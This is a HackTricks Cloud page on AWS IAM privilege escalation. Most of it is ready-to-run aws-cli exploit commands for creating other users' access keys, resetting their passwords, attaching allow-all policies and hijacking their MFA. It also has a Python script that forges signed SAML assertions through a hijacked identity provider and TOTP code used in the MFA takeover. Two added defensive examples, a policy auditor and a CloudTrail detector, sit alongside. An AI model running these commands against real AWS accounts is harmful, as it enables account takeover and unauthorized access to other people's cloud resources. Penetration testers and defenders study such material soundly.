AWS - IAM Privesc
Tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the Discord group or the telegram group or follow us on Twitter @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
## IAM
For more information about IAM check:
AWS - IAM, Identity Center & SSO Enum
### iam:CreatePolicyVersion
Allows creating a new version of an IAM policy, bypassing the need for the iam:SetDefaultPolicyVersion permission by using the --set-as-default flag. This allows defining custom permissions.
Exploit Command:
```bash
aws iam create-policy-version --policy-arn <target_policy_arn> \
    --policy-document file:///path/to/administrator/policy.json --set-as-default
```
Impact: Direct privilege escalation by allowing any action on any resource.
### iam:SetDefaultPolicyVersion
Allows changing the default version of an IAM policy to another existing version, which can escalate privileges if the new version has more permissions.
Bash Command:
```bash
aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id v2
```
Impact: Indirect privilege escalation by enabling more permissions.
### iam:CreateAccessKey, (iam:DeleteAccessKey)
Allows creating an access key ID and secret access key for another user, leading to potential privilege escalation.
Exploit:
```bash
aws iam create-access-key --user-name <target_user>
```
Impact: Direct privilege escalation by assuming the extended permissions of another user.
Note that a user can have only 2 access keys, so if the user already has 2 access keys you will need the iam:DeleteAccessKey permission to delete one of them before you can create a new one:
```bash
aws iam delete-access-key --access-key-id <key_id>
```
### iam:CreateVirtualMFADevice + iam:EnableMFADevice
If you can create a new virtual MFA device and enable it for another user, you can effectively register your own MFA for that user and then request MFA-authenticated sessions for their credentials.
Exploit:
```bash
# Create a virtual MFA device (this returns the serial and the base32 seed)
aws iam create-virtual-mfa-device --virtual-mfa-device-name <mfa_name>
# Generate 2 consecutive TOTP codes from the seed, then enable it for the user
aws iam enable-mfa-device --user-name <target_user> --serial-number <serial> \
    --authentication-code1 <code1> --authentication-code2 <code2>
```
Impact: Direct privilege escalation by taking control of the user's MFA registration (and then using their permissions).
### iam:CreateLoginProfile | iam:UpdateLoginProfile
Allows creating or updating a login profile, including setting passwords for AWS console login, leading to direct privilege escalation.
Exploit for Creation:
```bash
aws iam create-login-profile --user-name target_user --no-password-reset-required \
    --password '<password>'
```
Exploit for Update:
```bash
aws iam update-login-profile --user-name target_user --no-password-reset-required \
    --password '<password>'
```
Impact: Direct privilege escalation by logging in as 'any' user.
### iam:UpdateAccessKey
Allows enabling a disabled access key, which can lead to unauthorized access if the attacker possesses the disabled key.
Exploit:
```bash
aws iam update-access-key --access-key-id <ACCESS_KEY_ID> --status Active --user-name <username>
```
Impact: Direct privilege escalation by reactivating access keys.
### iam:CreateServiceSpecificCredential | iam:ResetServiceSpecificCredential
Allows creating or resetting credentials for specific AWS services (typically CodeCommit). These are not AWS API keys: they are username/password credentials for one specific service, and you can only use them where that service accepts them.
Creation:
```bash
aws iam create-service-specific-credential --user-name <target_user> --service-name codecommit.amazonaws.com
```
Save:
- ServiceSpecificCredential.ServiceUserName
- ServiceSpecificCredential.ServicePassword
Example:
```bash
# Find a repository you can access as the target
aws codecommit list-repositories
export REPO_NAME="<repo_name>"
export AWS_REGION="us-east-1" # adjust if needed
# Git URL (HTTPS)
export CLONE_URL="https://git-codecommit.${AWS_REGION}.amazonaws.com/v1/repos/${REPO_NAME}"
# Clone and use the ServiceUserName/ServicePassword when prompted
git clone "$CLONE_URL"
cd "$REPO_NAME"
```
Note: the service password often contains characters such as +, / and =. Using the interactive prompt is usually easier. If you embed it in the URL, URL-encode it first.
At this point you can read anything the target user can access in CodeCommit (for example, a leaked credentials file). If you find AWS access keys in the repo, create a new AWS CLI profile with those keys and then access resources (for example, read a flag from Secrets Manager):
```bash
aws secretsmanager get-secret-value --secret-id <secret_name> --profile <new_profile>
```
Reset:
```bash
aws iam reset-service-specific-credential --service-specific-credential-id <credential_id>
```
Impact: privilege escalation within the target user's permissions for the named service (and potentially further if you pivot using data obtained from that service).
### iam:AttachUserPolicy || iam:AttachGroupPolicy
Allows attaching policies to users or groups, directly escalating privileges by inheriting the permissions of the attached policy.
Exploit for User:
```bash
aws iam attach-user-policy --user-name <username> --policy-arn "<policy_arn>"
```
Exploit for Group:
```bash
aws iam attach-group-policy --group-name <group_name> --policy-arn "<policy_arn>"
```
Impact: Direct privilege escalation to whatever the policy allows.
### iam:AttachRolePolicy, (sts:AssumeRole | iam:CreateRole) | iam:PutUserPolicy | iam:PutGroupPolicy | iam:PutRolePolicy
Allows attaching or putting policies to roles, users, or groups, allowing direct privilege escalation by granting additional permissions.
Exploit for Role:
```bash
aws iam attach-role-policy --role-name <role_name> --policy-arn "<policy_arn>"
```
Exploit for Inline Policies:
```bash
aws iam put-user-policy --user-name <username> --policy-name "<policy_name>" \
    --policy-document "file:///path/to/policy.json"
aws iam put-group-policy --group-name <group_name> --policy-name "<policy_name>" \
    --policy-document file:///path/to/policy.json
aws iam put-role-policy --role-name <role_name> --policy-name "<policy_name>" \
    --policy-document file:///path/to/policy.json
```
You can use a policy like:
```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["*"],
            "Resource": ["*"]
        }
    ]
}
```
Impact: Direct privilege escalation by adding permissions through policies.
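Whether a policy opens any of the paths on this page depends on how its Action patterns resolve, and wildcards such as iam:Create* are easy to misjudge. The following is an added example (not code from the original page or from AWS) that audits a policy document against the privilege-escalation actions listed here, honoring IAM's case-insensitive `*`/`?` globs, NotAction and explicit Deny; Resource and Condition are deliberately ignored, so the result over-approximates what is effectively granted. The sample policies are constructed.

```python
import fnmatch

# IAM actions this page lists as privilege-escalation paths.
PRIVESC_ACTIONS = [
    "iam:CreatePolicyVersion", "iam:SetDefaultPolicyVersion",
    "iam:CreateAccessKey", "iam:UpdateAccessKey",
    "iam:CreateLoginProfile", "iam:UpdateLoginProfile",
    "iam:CreateServiceSpecificCredential", "iam:ResetServiceSpecificCredential",
    "iam:AttachUserPolicy", "iam:AttachGroupPolicy", "iam:AttachRolePolicy",
    "iam:PutUserPolicy", "iam:PutGroupPolicy", "iam:PutRolePolicy",
    "iam:AddUserToGroup", "iam:UpdateAssumeRolePolicy",
    "iam:CreateVirtualMFADevice", "iam:EnableMFADevice", "iam:DeactivateMFADevice",
    "iam:ResyncMFADevice", "iam:UploadSSHPublicKey",
    "iam:UpdateSAMLProvider", "iam:UpdateOpenIDConnectProviderThumbprint",
    "iam:PutUserPermissionsBoundary", "iam:PutRolePermissionsBoundary",
]


def _as_list(value):
    """IAM accepts either a single string or a list in Statement/Action/NotAction."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _action_matches(pattern: str, action: str) -> bool:
    """IAM action matching is case-insensitive and supports * and ? wildcards."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def statement_covers(stmt: dict, action: str) -> bool:
    """Does this statement's Action/NotAction cover `action`?
    Resource and Condition are ignored, so this over-approximates."""
    if "Action" in stmt:
        return any(_action_matches(p, action) for p in _as_list(stmt["Action"]))
    if "NotAction" in stmt:
        return not any(_action_matches(p, action) for p in _as_list(stmt["NotAction"]))
    return False


def granted_privesc_actions(policy: dict) -> list:
    """Privesc-capable actions the policy grants: some Allow covers it and no Deny does."""
    stmts = _as_list(policy.get("Statement"))
    allows = [s for s in stmts if s.get("Effect") == "Allow"]
    denies = [s for s in stmts if s.get("Effect") == "Deny"]
    return [
        a for a in PRIVESC_ACTIONS
        if any(statement_covers(s, a) for s in allows)
        and not any(statement_covers(s, a) for s in denies)
    ]


# Constructed sample policies (not taken from any real account).
ALLOW_ALL = {"Version": "2012-10-17",
             "Statement": [{"Effect": "Allow", "Action": ["*"], "Resource": ["*"]}]}

# Reads like a narrow "create things" policy, but iam:Create* still covers several paths above.
CREATE_STAR = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["iam:Create*", "iam:Get*", "iam:List*"], "Resource": "*"},
    {"Effect": "Deny", "Action": "iam:CreateLoginProfile", "Resource": "*"},
]}

READ_ONLY = {"Version": "2012-10-17", "Statement": {
    "Effect": "Allow", "Action": ["iam:Get*", "iam:List*"], "Resource": "*"}}

if __name__ == "__main__":
    for name, pol in [("ALLOW_ALL", ALLOW_ALL), ("CREATE_STAR", CREATE_STAR), ("READ_ONLY", READ_ONLY)]:
        print(name, "->", granted_privesc_actions(pol))
```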
### iam:AddUserToGroup
Allows adding yourself to an IAM group, escalating privileges by inheriting the group's permissions.
Exploit:
```bash
aws iam add-user-to-group --group-name <group_name> --user-name <username>
```
Impact: Direct privilege escalation to the level of the group's permissions.
### iam:UpdateAssumeRolePolicy
Allows changing the assume role policy document of a role, thereby allowing the role, and its associated permissions, to be assumed.
Exploit:
```bash
aws iam update-assume-role-policy --role-name <role_name> \
    --policy-document file:///path/to/assume/role/policy.json
```
Where the policy looks like the following, which grants the user permission to assume the role:
```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "sts:AssumeRole",
            "Principal": {
                "AWS": "$USER_ARN"
            }
        }
    ]
}
```
Impact: Direct privilege escalation by assuming any role's permissions.
### iam:UploadSSHPublicKey || iam:DeactivateMFADevice
Allows uploading an SSH public key for authenticating to CodeCommit and deactivating MFA devices, leading to potential indirect privilege escalation.
Exploit for SSH Key Upload:
```bash
aws iam upload-ssh-public-key --user-name <username> --ssh-public-key-body <key_body>
```
Exploit for Deactivating MFA:
```bash
aws iam deactivate-mfa-device --user-name <username> --serial-number <serial_number>
```
Impact: Indirect privilege escalation by enabling CodeCommit access or disabling MFA protections.
### iam:ResyncMFADevice
Allows resynchronizing an MFA device, potentially leading to indirect privilege escalation by manipulating MFA protections.
Bash Command:
```bash
aws iam resync-mfa-device --user-name <username> --serial-number <serial_number> \
    --authentication-code1 <code1> --authentication-code2 <code2>
```
Impact: Indirect privilege escalation by adding or manipulating MFA devices.
### iam:UpdateSAMLProvider, iam:ListSAMLProviders, (iam:GetSAMLProvider)
With these permissions you can change the XML metadata of the SAML connection. Then, you could abuse the SAML federation to login with any role that trusts it.
Note that by doing this, legitimate users won't be able to login. However, you can get the XML, so you can put yours, login and restore the previous one.
```bash
# List SAMLs
aws iam list-saml-providers
# Optional: Get SAML provider XML
aws iam get-saml-provider --saml-provider-arn <ARN>
# Update SAML provider
aws iam update-saml-provider --saml-metadata-document <value> --saml-provider-arn <arn>
## Login impersonating roles that trust the SAML provider
# Optional: Set the previous XML back
aws iam update-saml-provider --saml-metadata-document <previous-xml> --saml-provider-arn <arn>
```
End-to-end attack:
1. List the SAML provider and a role that trusts it:
```bash
export AWS_REGION=${AWS_REGION:-us-east-1}
aws iam list-saml-providers
export PROVIDER_ARN="arn:aws:iam::<ACCOUNT_ID>:saml-provider/<PROVIDER_NAME>"
# Backup current metadata so you can restore it later:
aws iam get-saml-provider --saml-provider-arn "$PROVIDER_ARN" > /tmp/saml-provider-backup.json
# Find candidate roles and inspect their trust policy to confirm they allow sts:AssumeRoleWithSAML:
aws iam list-roles | grep -i saml || true
aws iam get-role --role-name "<ROLE_NAME>"
export ROLE_ARN="arn:aws:iam::<ACCOUNT_ID>:role/<ROLE_NAME>"
```
2. Forge IdP metadata + a signed SAML assertion for the role/provider pair:
```bash
python3 -m venv /tmp/saml-federation-venv
source /tmp/saml-federation-venv/bin/activate
pip install lxml signxml
# Create /tmp/saml_forge.py from the expandable below first:
python3 /tmp/saml_forge.py --role-arn "$ROLE_ARN" --principal-arn "$PROVIDER_ARN" > /tmp/saml-forge.json
python3 - <<'PY'
import json
j=json.load(open("/tmp/saml-forge.json","r"))
open("/tmp/saml-metadata.xml","w").write(j["metadata_xml"])
open("/tmp/saml-assertion.b64","w").write(j["assertion_b64"])
print("Wrote /tmp/saml-metadata.xml and /tmp/saml-assertion.b64")
PY
```
Expandable: /tmp/saml_forge.py helper (metadata + signed assertion)
```python
#!/usr/bin/env python3
from __future__ import annotations
import argparse
import base64
import datetime as dt
import json
import os
import subprocess
import tempfile
import uuid

from lxml import etree
from signxml import XMLSigner, methods


def _run(cmd: list[str]) -> str:
    p = subprocess.run(cmd, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
    return p.stdout


def _openssl_make_key_and_cert(tmpdir: str) -> tuple[str, str]:
    # Self-signed signing key and certificate for the IdP
    key_path = os.path.join(tmpdir, "key.pem")
    cert_path = os.path.join(tmpdir, "cert.pem")
    _run(
        [
            "openssl", "req", "-x509", "-newkey", "rsa:2048",
            "-keyout", key_path, "-out", cert_path,
            "-days", "3650", "-nodes", "-subj", "/CN=attacker-idp",
        ]
    )
    return key_path, cert_path


def _pem_cert_to_b64(cert_pem: str) -> str:
    # Strip the PEM armor and keep only the base64 body of the certificate
    lines = []
    for line in cert_pem.splitlines():
        if "BEGIN CERTIFICATE" in line or "END CERTIFICATE" in line:
            continue
        if line.strip():
            lines.append(line.strip())
    return "".join(lines)


def make_metadata_xml(cert_b64: str) -> str:
    # The IdP metadata template (an f-string embedding cert_b64) did not survive
    # extraction on this page; it is left empty here rather than reconstructed.
    return f""""""


def make_signed_saml_response(role_arn: str, principal_arn: str, key_pem: str, cert_pem: str) -> bytes:
    ns = {
        "saml2p": "urn:oasis:names:tc:SAML:2.0:protocol",
        "saml2": "urn:oasis:names:tc:SAML:2.0:assertion",
    }
    issue_instant = dt.datetime.now(dt.timezone.utc)
    not_before = issue_instant - dt.timedelta(minutes=2)
    not_on_or_after = issue_instant + dt.timedelta(minutes=10)
    # XML IDs must not start with a digit, hence the "_" prefix
    resp_id = "_" + str(uuid.uuid4())
    assertion_id = "_" + str(uuid.uuid4())

    response = etree.Element(etree.QName(ns["saml2p"], "Response"), nsmap=ns)
    response.set("ID", resp_id)
    response.set("Version", "2.0")
    response.set("IssueInstant", issue_instant.isoformat())
    response.set("Destination", "https://signin.aws.amazon.com/saml")
    issuer = etree.SubElement(response, etree.QName(ns["saml2"], "Issuer"))
    issuer.text = "https://attacker-idp.invalid/idp"
    status = etree.SubElement(response, etree.QName(ns["saml2p"], "Status"))
    status_code = etree.SubElement(status, etree.QName(ns["saml2p"], "StatusCode"))
    status_code.set("Value", "urn:oasis:names:tc:SAML:2.0:status:Success")

    assertion = etree.SubElement(response, etree.QName(ns["saml2"], "Assertion"))
    assertion.set("ID", assertion_id)
    assertion.set("Version", "2.0")
    assertion.set("IssueInstant", issue_instant.isoformat())
    a_issuer = etree.SubElement(assertion, etree.QName(ns["saml2"], "Issuer"))
    a_issuer.text = "https://attacker-idp.invalid/idp"

    subject = etree.SubElement(assertion, etree.QName(ns["saml2"], "Subject"))
    name_id = etree.SubElement(subject, etree.QName(ns["saml2"], "NameID"))
    name_id.set("Format", "urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified")
    name_id.text = "attacker"
    subject_conf = etree.SubElement(subject, etree.QName(ns["saml2"], "SubjectConfirmation"))
    subject_conf.set("Method", "urn:oasis:names:tc:SAML:2.0:cm:bearer")
    subject_conf_data = etree.SubElement(subject_conf, etree.QName(ns["saml2"], "SubjectConfirmationData"))
    subject_conf_data.set("NotOnOrAfter", not_on_or_after.isoformat())
    subject_conf_data.set("Recipient", "https://signin.aws.amazon.com/saml")

    conditions = etree.SubElement(assertion, etree.QName(ns["saml2"], "Conditions"))
    conditions.set("NotBefore", not_before.isoformat())
    conditions.set("NotOnOrAfter", not_on_or_after.isoformat())
    audience_restriction = etree.SubElement(conditions, etree.QName(ns["saml2"], "AudienceRestriction"))
    audience = etree.SubElement(audience_restriction, etree.QName(ns["saml2"], "Audience"))
    audience.text = "https://signin.aws.amazon.com/saml"

    authn_statement = etree.SubElement(assertion, etree.QName(ns["saml2"], "AuthnStatement"))
    authn_statement.set("AuthnInstant", issue_instant.isoformat())
    authn_statement.set("SessionIndex", str(uuid.uuid4()))
    authn_context = etree.SubElement(authn_statement, etree.QName(ns["saml2"], "AuthnContext"))
    authn_context_class_ref = etree.SubElement(authn_context, etree.QName(ns["saml2"], "AuthnContextClassRef"))
    authn_context_class_ref.text = "urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport"

    # AWS reads the role/provider pair and the session name from these two attributes
    attribute_statement = etree.SubElement(assertion, etree.QName(ns["saml2"], "AttributeStatement"))
    attr_role = etree.SubElement(attribute_statement, etree.QName(ns["saml2"], "Attribute"))
    attr_role.set("Name", "https://aws.amazon.com/SAML/Attributes/Role")
    attr_role_value = etree.SubElement(attr_role, etree.QName(ns["saml2"], "AttributeValue"))
    attr_role_value.text = f"{role_arn},{principal_arn}"
    attr_session = etree.SubElement(attribute_statement, etree.QName(ns["saml2"], "Attribute"))
    attr_session.set("Name", "https://aws.amazon.com/SAML/Attributes/RoleSessionName")
    attr_session_value = etree.SubElement(attr_session, etree.QName(ns["saml2"], "AttributeValue"))
    attr_session_value.text = "attacker-idp"

    with open(key_pem, "rb") as f:
        key_bytes = f.read()
    with open(cert_pem, "rb") as f:
        cert_bytes = f.read()
    signer = XMLSigner(
        method=methods.enveloped,
        signature_algorithm="rsa-sha256",
        digest_algorithm="sha256",
        c14n_algorithm="http://www.w3.org/2001/10/xml-exc-c14n#",
    )
    signed_assertion = signer.sign(
        assertion, key=key_bytes, cert=cert_bytes, reference_uri=f"#{assertion_id}", id_attribute="ID",
    )
    response.remove(assertion)
    response.append(signed_assertion)
    return etree.tostring(response, xml_declaration=True, encoding="utf-8")


def main() -> None:
    ap = argparse.ArgumentParser()
    ap.add_argument("--role-arn", required=True)
    ap.add_argument("--principal-arn", required=True)
    args = ap.parse_args()
    with tempfile.TemporaryDirectory() as tmp:
        key_path, cert_path = _openssl_make_key_and_cert(tmp)
        cert_pem = open(cert_path, "r", encoding="utf-8").read()
        cert_b64 = _pem_cert_to_b64(cert_pem)
        metadata_xml = make_metadata_xml(cert_b64)
        saml_xml = make_signed_saml_response(args.role_arn, args.principal_arn, key_path, cert_path)
        saml_b64 = base64.b64encode(saml_xml).decode("ascii")
    print(json.dumps({"metadata_xml": metadata_xml, "assertion_b64": saml_b64}))


if __name__ == "__main__":
    main()
```
3. Update the SAML provider metadata with your IdP certificate, assume the role, and use the returned STS credentials:
```bash
aws iam update-saml-provider --saml-provider-arn "$PROVIDER_ARN" \
    --saml-metadata-document file:///tmp/saml-metadata.xml
# Assertion is base64 and can be long. Keep it on one line:
ASSERTION_B64=$(tr -d '\n' </tmp/saml-assertion.b64)
SESSION_LINE=$(aws sts assume-role-with-saml --role-arn "$ROLE_ARN" --principal-arn "$PROVIDER_ARN" --saml-assertion "$ASSERTION_B64" \
    --query 'Credentials.[AccessKeyId,SecretAccessKey,SessionToken,Expiration]' --output text)
IFS=$'\t' read -r SESSION_AK SESSION_SK SESSION_ST SESSION_EXP <<<"$SESSION_LINE"
echo "Session expires at: $SESSION_EXP"
# Use creds inline (no need to create an AWS CLI profile):
AWS_ACCESS_KEY_ID="$SESSION_AK" AWS_SECRET_ACCESS_KEY="$SESSION_SK" AWS_SESSION_TOKEN="$SESSION_ST" AWS_REGION="$AWS_REGION" \
    aws sts get-caller-identity
```
4. Cleanup: restore the original metadata:
```bash
python3 - <<'PY'
import json
j=json.load(open("/tmp/saml-provider-backup.json","r"))
open("/tmp/saml-metadata-original.xml","w").write(j["SAMLMetadataDocument"])
PY
aws iam update-saml-provider --saml-provider-arn "$PROVIDER_ARN" \
    --saml-metadata-document file:///tmp/saml-metadata-original.xml
```
Warning: Updating the SAML provider metadata can cause disruption: while your metadata is in place, legitimate SSO users may not be able to authenticate.
### iam:UpdateOpenIDConnectProviderThumbprint, iam:ListOpenIDConnectProviders, (iam:GetOpenIDConnectProvider)
(Not sure about this one) If an attacker has these permissions, they could add a new Thumbprint in order to be able to login in all the roles that trust the provider.
```bash
# List providers
aws iam list-open-id-connect-providers
# Optional: Get Thumbprints used to not delete them
aws iam get-open-id-connect-provider --open-id-connect-provider-arn <ARN>
# Update Thumbprints (The thumbprint is always a 40-character string)
aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn <ARN> --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3
```
### iam:PutUserPermissionsBoundary
This permission allows an attacker to update a user's permissions boundary, potentially escalating their privileges by letting them perform actions that were previously restricted by the permissions they currently have.
```bash
aws iam put-user-permissions-boundary \
    --user-name <nombre_usuario> \
    --permissions-boundary arn:aws:iam::<cuenta>:policy/<nombre_politica>
```
An example of a policy that applies no restriction is:
```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "BoundaryAllowAll",
            "Effect": "Allow",
            "Action": "*",
            "Resource": "*"
        }
    ]
}
```
### iam:PutRolePermissionsBoundary
Someone with iam:PutRolePermissionsBoundary can set a permissions boundary on an existing role. The risk arises when that person changes a role's boundary: they can either restrict operations improperly (causing service disruption) or, if they attach a permissive boundary, effectively widen what the role can do and escalate privileges.
```bash
aws iam put-role-permissions-boundary \
    --role-name <Role_Name> \
    --permissions-boundary arn:aws:iam::111122223333:policy/BoundaryPolicy
```
### iam:CreateVirtualMFADevice, iam:EnableMFADevice & sts:GetSessionToken
The attacker creates a virtual MFA device under their control and binds it to the target IAM user, replacing or overriding the victim's original MFA. Using the seed of this attacker-controlled MFA, they generate valid one-time passwords and request an MFA-authenticated session token via STS. This lets the attacker satisfy the MFA requirement and obtain short-lived credentials as the victim, effectively completing an account takeover even though MFA is enabled.
If the target user already has MFA, deactivate it (iam:DeactivateMFADevice):
```bash
aws iam deactivate-mfa-device \
    --user-name TARGET_USER \
    --serial-number arn:aws:iam::ACCOUNT_ID:mfa/EXISTING_DEVICE_NAME
```
Create a new virtual MFA device (writes the seed to a file):
```bash
aws iam create-virtual-mfa-device \
    --virtual-mfa-device-name VIRTUAL_MFA_DEVICE_NAME \
    --bootstrap-method Base32StringSeed \
    --outfile /tmp/mfa-seed.txt
```
Generate two consecutive TOTP codes from the seed file:
```python
import base64, hmac, hashlib, struct, time

seed = open("/tmp/mfa-seed.txt").read().strip()
# Pad the base32 seed to a multiple of 8 characters before decoding
seed = seed + ("=" * ((8 - (len(seed) % 8)) % 8))
key = base64.b32decode(seed, casefold=True)

def totp(t):
    # RFC 6238: 30-second time step, HMAC-SHA1, 6-digit dynamic truncation
    counter = int(t / 30)
    msg = struct.pack(">Q", counter)
    h = hmac.new(key, msg, hashlib.sha1).digest()
    o = h[-1] & 0x0F
    code = (struct.unpack(">I", h[o:o+4])[0] & 0x7fffffff) % 1000000
    return f"{code:06d}"

now = int(time.time())
print(totp(now))
print(totp(now + 30))
```
Enable the MFA device for the target user, replacing MFA_SERIAL_ARN, CODE1, CODE2:
```bash
aws iam enable-mfa-device \
    --user-name TARGET_USER \
    --serial-number MFA_SERIAL_ARN \
    --authentication-code1 CODE1 \
    --authentication-code2 CODE2
```
Generate a fresh TOTP code from the seed for the current time step:
```python
import base64, hmac, hashlib, struct, time

seed = open("/tmp/mfa-seed.txt").read().strip()
seed = seed + ("=" * ((8 - (len(seed) % 8)) % 8))
key = base64.b32decode(seed, casefold=True)
counter = int(time.time() / 30)
msg = struct.pack(">Q", counter)
h = hmac.new(key, msg, hashlib.sha1).digest()
o = h[-1] & 0x0F
code = (struct.unpack(">I", h[o:o+4])[0] & 0x7fffffff) % 1000000
print(f"{code:06d}")
```
Copy the printed value as TOKEN_CODE and request an MFA-authenticated session token (STS):
```bash
aws sts get-session-token \
    --serial-number MFA_SERIAL_ARN \
    --token-code TOKEN_CODE
```
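Every path on this page is an IAM control-plane call and therefore lands in CloudTrail. The following is an added example (not code from the original page or from AWS) that classifies CloudTrail records against the actions listed above, rating cross-principal changes (one identity touching another user's keys, MFA, password or policies) and policy/trust/identity-provider changes as high, self-service changes as low, and denied attempts as medium, since a failed call still shows someone probing for an escalation path. It relies on the standard CloudTrail fields eventSource, eventName, userIdentity, requestParameters and errorCode; the sample records are constructed and trimmed to those fields.

```python
import json

# CloudTrail eventName -> requestParameters field that names the affected user
# (None when the target is a policy, group, role or identity provider instead).
WATCHED_EVENTS = {
    "CreatePolicyVersion": None, "SetDefaultPolicyVersion": None,
    "CreateAccessKey": "userName", "UpdateAccessKey": "userName",
    "CreateLoginProfile": "userName", "UpdateLoginProfile": "userName",
    "CreateServiceSpecificCredential": "userName", "ResetServiceSpecificCredential": None,
    "AttachUserPolicy": "userName", "AttachGroupPolicy": None, "AttachRolePolicy": None,
    "PutUserPolicy": "userName", "PutGroupPolicy": None, "PutRolePolicy": None,
    "AddUserToGroup": "userName", "UpdateAssumeRolePolicy": None,
    "EnableMFADevice": "userName", "DeactivateMFADevice": "userName",
    "ResyncMFADevice": "userName", "UploadSSHPublicKey": "userName",
    "UpdateSAMLProvider": None, "UpdateOpenIDConnectProviderThumbprint": None,
    "PutUserPermissionsBoundary": "userName", "PutRolePermissionsBoundary": None,
}


def classify_event(event: dict):
    """Return a finding for an IAM event on this page's privesc list, else None."""
    if event.get("eventSource") != "iam.amazonaws.com":
        return None
    name = event.get("eventName")
    if name not in WATCHED_EVENTS:
        return None
    identity = event.get("userIdentity") or {}
    actor = identity.get("userName") or identity.get("arn", "unknown")
    params = event.get("requestParameters") or {}
    target_field = WATCHED_EVENTS[name]
    target = params.get(target_field) if target_field else None
    if event.get("errorCode"):
        # A denied call is still a signal: someone is probing for an escalation path.
        severity, reason = "medium", f"denied attempt ({event['errorCode']})"
    elif target_field and target == actor:
        # Self-service on one's own keys/MFA/password is common and usually benign.
        severity, reason = "low", "self-service change"
    elif target_field:
        severity, reason = "high", f"{actor} modified credentials/permissions of {target}"
    else:
        severity, reason = "high", "policy, trust or identity-provider change"
    if name == "CreatePolicyVersion" and params.get("setAsDefault") is True:
        reason += "; new version set as default (bypasses SetDefaultPolicyVersion)"
    return {"eventName": name, "actor": actor, "target": target,
            "severity": severity, "reason": reason}


def scan(events):
    """Classify a batch of CloudTrail records, keeping only the findings."""
    return [f for f in (classify_event(e) for e in events) if f]


# Constructed sample CloudTrail records (trimmed to the fields used above).
SAMPLE_EVENTS = [
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "userIdentity": {"type": "IAMUser", "userName": "dev-bob"},
     "requestParameters": {"userName": "admin-alice"}},
    {"eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey",
     "userIdentity": {"type": "IAMUser", "userName": "dev-bob"},
     "requestParameters": {"userName": "dev-bob"}},
    {"eventSource": "iam.amazonaws.com", "eventName": "CreatePolicyVersion",
     "userIdentity": {"type": "IAMUser", "userName": "dev-bob"},
     "requestParameters": {"policyArn": "arn:aws:iam::111122223333:policy/DevPolicy",
                           "setAsDefault": True}},
    {"eventSource": "iam.amazonaws.com", "eventName": "AttachUserPolicy",
     "userIdentity": {"type": "IAMUser", "userName": "dev-bob"},
     "requestParameters": {"userName": "dev-bob",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"},
     "errorCode": "AccessDenied"},
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject",
     "userIdentity": {"type": "IAMUser", "userName": "dev-bob"}},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(json.dumps(finding))
```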